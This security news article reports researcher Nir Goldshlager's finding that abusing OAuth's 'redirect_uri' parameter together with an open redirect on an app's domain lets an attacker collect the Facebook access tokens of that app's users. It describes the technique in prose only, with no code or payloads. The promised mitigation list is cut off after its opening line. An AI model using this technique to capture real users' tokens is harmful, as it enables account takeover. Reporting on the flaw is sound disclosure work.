The advent of social networking did not change only the way people interact with each other, but also opened new challenges to authenticating a rich environment of applications to interact with the account.
Since logging into an application with your social network`s credentials is like handing your house keys to people you barely know, the Open Authorization standard has become increasingly popular. It intermediates the interaction between end-users and third-party apps without sharing username/password combinations.
Researcher Nir Goldshlager found a way to hijack the authorization tokens of all users of a specific application just by exploiting a redirect in the app vendor`s website.
Before reading further, take a look at how the OAuth framework works. If you don`t feel like reading technical documentation, here`s the rundown: The application you wish to use asks for a series of permissions to interact with your account. When you accept the interaction, Facebook offers the application an authorization token (think of it like a cookie) that is a random string providing temporary, secure access to Facebook APIs.
Exploitation of the OAuth mechanism is achieved by abusing a parameter called “redirect_uri” which would send the token to an attacker via a malicious application he controls.
“The attacker merely needs to locate a site redirection issue on the developer or owner`s app domain, and that`s it. They will be able to take the access_tokens of any user on Facebook who uses that particular app,” wrote Goldshlager on his blog. “Additionally, Facebook is powerless when it comes to fixing this issue. In fact, the developer or owner of the app needs to take responsibility for these flaws in order to avoid the potentially pernicious site redirection attacks.”
Here are a couple of things that can minimize the impact of the flaw:
tags
November 14, 2024
September 06, 2024